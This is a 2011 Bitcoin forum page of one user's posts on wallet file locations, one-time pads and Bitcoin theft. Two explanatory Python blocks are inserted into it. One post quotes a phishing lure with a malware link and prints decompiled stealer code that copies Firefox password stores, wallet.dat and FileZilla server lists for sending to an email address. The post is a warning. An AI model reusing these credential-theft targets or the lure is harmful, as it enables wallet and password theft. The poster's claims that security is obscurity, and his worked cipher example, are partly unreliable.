Bitcoin Forum
  Show Posts
1781  Other / Off-topic / Re: The biggest security hole -> Default values on: July 06, 2011, 07:50:32 PM

Quote
You give 1MB key for OTP comm with a sub, and rather you not send them any block longer than 1MB, send him War and Peace and you start to get a pattern.
sending him the pattern "War and Peace" in 1MB, does not create a pattern, in the encrypted data.
giving him a 10^100 byte key, and sending him 10^100 bytes "War and Peace", also does not.

it seems you simply don't understand it.


LOL! Missed this post!  Grin Grin Grin
"Send him War and Peace" doesn't mean send him "pattern War and Peace", but broadcast War and Peace, Leo Tolstoy book:

http://en.wikipedia.org/wiki/War_and_Peace

 Grin Grin Sending patterns.. I'm still laughing!!!  Grin Grin
1782  Other / Off-topic / Re: The biggest security hole -> Default values on: July 06, 2011, 07:38:12 PM
if i was a script kiddie i would code a 5 line trojan, that could scan your computer, for 1btc, and gain 500btc.

Damn! You're a cute troll  Grin Grin Grin
5 line trojan (with 20 Mb batch of attached DLL's?)  Grin
1783  Other / Off-topic / Re: The biggest security hole -> Default values on: July 06, 2011, 07:16:43 PM
No, the "Indecipherable cypher" is the "father" of OTP:

Caesar's cypher -> Indecipherable cypher -> OTP

Differences:

Caesar's Key: B
Text: APPLE
Result: BQQMF
(this was used by the Romans, strong enough for what they were facing)

"Indecipherable Cypher" Key: BEAN
Text: APPLE
Result: BTPZF

Early OTP Key -> has to match the size of the text to cypher, so BEANS
Text: APPLE
Result: BTPZX

Yes, but if the key gets compromised - and you didn't figure it out - then you'll be giving away info.
But that's for another field, a field for which encryption is a tool -> information.
Information is also valid in a time frame, imagine a German message intercepted in 1939 that just now got decrypted, it says «Tomorrow we will invade Poland»; what's the use to know it now?!

There's a significant increase in security by moving the file, despite if "some software can scan your computer", as that very same software probably can do whatever it takes no matter what security you imply.
I don't know if you were looking at the code or can reverse engineer software of the latest virus for Bitcoin, this method alone would put them all out of commission... yes in the future a better skilled coder(...); but also in the future machines calculating Petahashes per second(...).

BTW, back in the days while in the army I designed an OTP based chat system, you need a floppy key (no USB at such time) which have files like 1.key, 2.key(...). Each of those files have a very long passphrase inside and uses sync encrypt/decrypt, at random intervals the part which started the chat send a signal to switch the key to another <number>.key... pretty much simple, but effective... unless someone used diskcopy that is...
1784  Other / Off-topic / Re: The biggest security hole -> Default values on: July 06, 2011, 06:52:06 PM
Depends on what the trojan does.

Still, you believe it isn't worth 2 lines of code because some other attacks will get through? Then we rather let go computer security all at once, as eventually some kind of attacks will pass... so what's the use?

You give 1MB key for OTP comm with a sub, and rather you not send them any block longer than 1MB, send him War and Peace and you start to get a pattern.
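
What the 1MB key / War and Peace exchange above turns on, as an added example (not code from any poster): a pad that is cycled because the text is longer than the key lets the key cancel out, while a pad as long as the text does not. XOR as the pad operation, the 16-byte key length and the sample text are assumptions made for the illustration.

```python
import os
from itertools import cycle

# Constructed sample input: opening line of the novel, longer than the key.
TEXT = (b"Well, Prince, so Genoa and Lucca are now just family "
        b"estates of the Buonapartes.")
KEY_LEN = 16  # assumed key length, far shorter than the text


def xor_bytes(a, b):
    """XOR two byte sequences, stopping at the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def pad_encrypt(data, key):
    """XOR data with the key, wrapping around when the key runs out.
    With len(key) >= len(data) this is a true one-time pad."""
    return xor_bytes(data, cycle(key))


def cancel_key(ciphertext, key_len):
    """XOR each ciphertext byte with the one key_len positions later.
    If the key wrapped, both bytes used the same key byte, so the key
    drops out and what remains is plaintext XOR plaintext."""
    return xor_bytes(ciphertext[:-key_len], ciphertext[key_len:])


def recover_next_block(ciphertext, key_len, known_block):
    """Given one known plaintext block, read the following block
    without ever learning the key."""
    return xor_bytes(cancel_key(ciphertext, key_len)[:key_len], known_block)


if __name__ == "__main__":
    short_key = os.urandom(KEY_LEN)
    reused = pad_encrypt(TEXT, short_key)
    print("key cancels when reused:",
          cancel_key(reused, KEY_LEN) == xor_bytes(TEXT[:-KEY_LEN], TEXT[KEY_LEN:]))
    print("next block from known block:",
          recover_next_block(reused, KEY_LEN, TEXT[:KEY_LEN]))

    full_key = os.urandom(len(TEXT))  # pad as long as the text
    proper = pad_encrypt(TEXT, full_key)
    print("key cancels with full-length pad:",
          cancel_key(proper, KEY_LEN) == xor_bytes(TEXT[:-KEY_LEN], TEXT[KEY_LEN:]))
```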
1785  Other / Off-topic / Re: The biggest security hole -> Default values on: July 06, 2011, 06:07:23 PM
i can make a 100% unbreakable cipher

Wow! I'm impressed!  Grin
Not even PGP or SSL can be considered "unbreakable" - rather really hard to break -, guess you would get a Nobel Prize out of that one.
no nobel prize to me, already invented http://en.wikipedia.org/wiki/One-time_pad

by you saying that, can conclude that you have no knowledge at all on the subject. and therefore you are a troll. Cheesy

That's an improvement of
http://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher

The indecipherable cipher suffers from patterns, the pathetic attempt done by Gilbert was to create an algorithm where the key matches in size the crypt text. Resulting in a stupidity, as if you can send such key securely, you rather send the plain text the same way and spare you from some worthless work.

Given a long enough key and a short enough text to Vernam's method and you would get that effect already.

PS - This topic isn't about cryptography anyway... my idea just provides a "hiding the wallet" not "encrypt it". -> This means that currently is like if everybody was using their wallets in the back pocket, making life easier to pickpockets. My method would simply make anyone put the wallet wherever he wishes... making pickpockets to have to look for it - still doesn't mean you get rid of pickpockets, just their job gets harder.
 Roll Eyes
1786  Other / Off-topic / Re: The biggest security hole -> Default values on: July 06, 2011, 05:08:16 PM
i can make a 100% unbreakable cipher

Wow! I'm impressed!  Grin
Not even PGP or SSL can be considered "unbreakable" - rather really hard to break -, guess you would get a Nobel Prize out of that one.
1787  Other / Off-topic / Re: The biggest security hole -> Default values on: July 06, 2011, 04:40:50 PM
Troll, no. Many folks failed to understand the purpose of encryption and confuse it with "security" when all it does is "hide things" - therefore: provides obscurity.

Everyone with coding skills can make a fake client... what's your point with that one?!
I'm talking about implement this in the open source one...

@jgraham

Obscurity is meant to be something just you know, or a specific recipient; cryptography is just one way to do it. But to very end, security is obscurity and the more obscurity you add to it the more security you get; may it be in method or final product.
The worse part in security is to believe it's unbreakable... but that's "a wrong assumption" no matter the methods you used.

Actually, going a bit side line here, security and cryptography works this way:

If you're a good cryptographer and can create your own algorithms you get twice the protection: your own algorithm nobody else knows and the final product.
If you can't or don't want to create new algorithms you get standard protection: just the final product is protected, but the algorithm is widely known.
If you are a lousy crypto and still go for it, you get half or less of protection; your easy to break/figure out algorithm and poorly encrypted data.
1788  Other / Off-topic / Re: The biggest security hole -> Default values on: July 06, 2011, 04:29:15 PM
Wrong! Cryptography IS NOT security. Cryptography is a WAY to provide you OBSCURITY.
If you believe in security in open air, then just post your password. Better yet, why use passwords? Just come, pick a username and wear it up.

A script kiddie normally goes by AutoIt scripts and easy-to-implement code he can pick from the web; hooking into a running process isn't part of it.
This is also NOT the magical bullet that will kill all malicious software; it is a way to make it harder to do, so fewer people CAN do it, therefore fewer people DO IT.

Why make it easy to attack when all it takes is a file open dialog in the client or an argument passed to the bitcoind to make it way harder?
1789  Other / Off-topic / Re: The biggest security hole -> Default values on: July 06, 2011, 04:10:55 PM
Security IS obscurity. That dogma you stated makes no sense at all. Anything that's open isn't by nature secure; it's just open.

The value of BTC justifies for the user to search for it when he opens the client, so the wallet place isn't stored anywhere outside its owner brain. the client could well also allow hot-swap of wallets.


Yes, a trojan may scan your computer... making it dead slow and probably making you try to figure what's going on. But the current way the trojan have all the way open %APPDATA%\Bitcoin\wallet.dat; easy pick virus for any script kiddie.
1790  Other / Off-topic / The biggest security hole -> Default values on: July 06, 2011, 02:45:43 PM
Having default values set is the biggest security hole on most software, this behavior allows malicious software to know exactly what and where to find what it wants. Some examples are:

C:\Windows
%AppData%\Mozilla Firefox
%AppData%\Mozilla Thunderbird
%AppData%\Filezilla
%AppData%\Bitcoin

For some sorts of data this is OK, like the blockchain; for personal data it ain't. The Bitcoin client needs to be patched to allow users to choose where to store wallet.dat and, moreover, to choose what name to give to that file.
Think about it...
1791  Economy / Speculation / Re: CRASH! on: July 05, 2011, 02:46:41 PM
Holy! The floats are insane!

3 refreshes 30 seconds interval: 12.6, 13.65, 13.07  Shocked
1792  Economy / Speculation / Re: Bye Bitcoin! on: July 05, 2011, 02:13:31 PM
Yeah! Now I'm waiting for 14th July when everybody starts paying you to give you their bitcoins



 Grin
1793  Bitcoin / Bitcoin Technical Support / Re: Need help. Ubuntu Live USB - won't get new blocks after error 11DbException on: July 05, 2011, 12:52:04 PM
leave Ubuntu to the linux geeks

The last version you can leave for blind people actually, its desktop is the most obnoxious thing I've ever seen...  Grin

Ubuntis: STOP copying or try to copy Android! Desktops aren't mobile tiny devices!
1794  Bitcoin / Bitcoin Technical Support / Re: Need help. Ubuntu Live USB - won't get new blocks after error 11DbException on: July 05, 2011, 11:34:51 AM
(...)because linux is generally good with viruses(...)

This is to spread a fake feeling of security. The only "advantage" is that Linux, by being way less used, has fewer viruses designed for it than Windows; it isn't "good with viruses".
Like FF, normally safer than IE, yet yesterday I decompiled a bitcoin virus that goes after FF stored passwords...
1795  Bitcoin / Bitcoin Technical Support / Re: Are linux .bitcoin files interchangable with windows AppData\Bitcoin? on: July 05, 2011, 11:30:24 AM
Yes, you can.

I use to input the blockchain from my windows desktop to my linux boxes (so I don't have to go dload it again by p2p) and never had issues.
Just that normally I don't pass the wallet.dat along, but I believe it's ok also.
1796  Bitcoin / Bitcoin Discussion / Re: ALL of my bitcoins stolen (Around 60) . What the F*CK. on: July 04, 2011, 11:42:30 PM
You didn't fall for this email, did you:

Quote
Dear Mt.Gox user,

As i'm sure most of you are well aware, there has been a serious compromise of Mt. Gox's database.

We implore all of our users to take safety precautions to ensure their assets are not at risk, as your password may have been compromised

Please Follow the instructions here (Instructions are given by text and an image) : http://www.fileden.com/files/2011/6/17/3153783/Mt.Gox-Safety-Tutorials.rar

It is very important that you follow these instructions to prevent any further compromises on other sites that you browse.

Thanks,

The Mt.Gox team

BTW, how can you be confident about viruses, etc, if you have an unencrypted wallet and you lost all your BTC from it. I mean, really, think about it.


Sorry to go a bit offtopic, but the robber who created that virus really went hardcore; full time robber!
Here's what it goes after (it's an AutoIt script compiled and UPX packed):

Code:
FileCopy(Execute(" @AppDataDir ") & "\Mozilla\Firefox\Profiles\" & $Var1512 & "\key3.db", "C:\temp1\")
FileCopy(Execute(" @AppDataDir ") & "\Mozilla\Firefox\Profiles\" & $Var1512 & "\signons*", "C:\temp1\signons")
FileCopy(Execute(" @AppDataDir ") & "\bitcoin\" & "wallet.dat", "C:\temp1\")
FileCopy(Execute(" @AppDataDir ") & "\filezilla\" & "recentservers.xml", "C:\temp1\")

And sends it to:

clintonlowe46@gmail.com

EDIT: For those wondering if they are infected, look for a folder named "readme" with a file inside named "READ-FIRST.txt", inside your AppData dir (C:\documents and settings\<user>\Application Data (2k/xp) - c:\users\<user>\AppData\Roaming (Vista/7))
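
The infection check from the EDIT above, scripted as an added example (not part of the original post): it looks for the readme\READ-FIRST.txt marker under the AppData dir and for leftover copies in the C:\temp1\ folder that the quoted FileCopy lines write to. The function names, and the assumption that the staged copies are still on disk, are this example's own.

```python
import os
from pathlib import Path

# Indicators as given in the post above.
MARKER = Path("readme") / "READ-FIRST.txt"      # under the AppData dir
STAGING_DIR = r"C:\temp1"                        # FileCopy destination
STAGED_NAMES = {"key3.db", "wallet.dat", "recentservers.xml"}
STAGED_PREFIX = "signons"                        # from the signons* copy


def check_host(appdata_dir, staging_dir=STAGING_DIR):
    """Return (indicator, path) findings for one user profile."""
    findings = []
    marker = Path(appdata_dir) / MARKER
    if marker.is_file():
        findings.append(("marker-file", str(marker)))

    staging = Path(staging_dir)
    if staging.is_dir():
        for entry in sorted(staging.iterdir()):
            name = entry.name.lower()
            if name in STAGED_NAMES or name.startswith(STAGED_PREFIX):
                findings.append(("staged-copy", str(entry)))
    return findings


def appdata_candidates(env=os.environ):
    """%APPDATA% of the current user: Application Data on 2k/XP,
    AppData\\Roaming on Vista/7. Empty list when the variable is unset."""
    value = env.get("APPDATA")
    return [value] if value else []


if __name__ == "__main__":
    hits = [f for d in appdata_candidates() for f in check_host(d)]
    for kind, path in hits:
        print(f"{kind}: {path}")
    if not hits:
        print("no indicators from the post found for this user")
```

Run it once per user profile; a hit on either indicator also means the Firefox and FileZilla credentials in the copied files should be treated as exposed, not only the wallet.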
1797  Bitcoin / Bitcoin Discussion / Re: My country doesn't trust dollar anymore on: July 04, 2011, 11:44:43 AM
the usual steps :
receive dollar -> put it into coffer -> exchange it later.
those steps change to :
receive dollar -> exchange it to local currency (gets an addon extra charge inflationary rates) -> put it into coffer.

You're missing one important step:

receive dollar -> exchange it to local currency (gets an addon extra charge inflationary rates) -> give some to the local corrupt police -> put it into coffer.

Otherwise you end up in jail...  Roll Eyes
1798  Bitcoin / Bitcoin Discussion / Re: Bitcoin plus - is it owned by a member of this forum? - RANT ALERT! on: July 04, 2011, 01:34:30 AM
Quote
If a generating node receives a transaction that should include a transaction fee but doesn't, they may refuse to include it in their blocks. It might be included in a later block if someone is willing to accept it.

 Roll Eyes

Yes... they can patch and rebuild bitcoind... but then you probably will wait a bit longer prior to see anything hit the blockchain.
1799  Bitcoin / Bitcoin Discussion / Re: My country doesn't trust dollar anymore on: July 04, 2011, 12:10:34 AM
Just tried to comment the case with my wife, which happens to be Eastern Javanese, she started to talk about some guys a while ago buying iPads from Singapore with USD and then sell them at Indonesia for USD but without bhs Indonesia instructions... and then 2 of them were arrested and they passed a bill about forbidden trading with USD within ID.
Kind of a confusing story...  Shocked ...sounds like an ad-hoc law.

Does any of this check out?!
1800  Bitcoin / Bitcoin Discussion / Re: My country doesn't trust dollar anymore on: July 03, 2011, 11:56:34 PM
Well, a thing that I remember from Indonesia is that they took every load of bullshit FED could put into them. Starting for the USD bills to be "in mint condition", otherwise they were refused.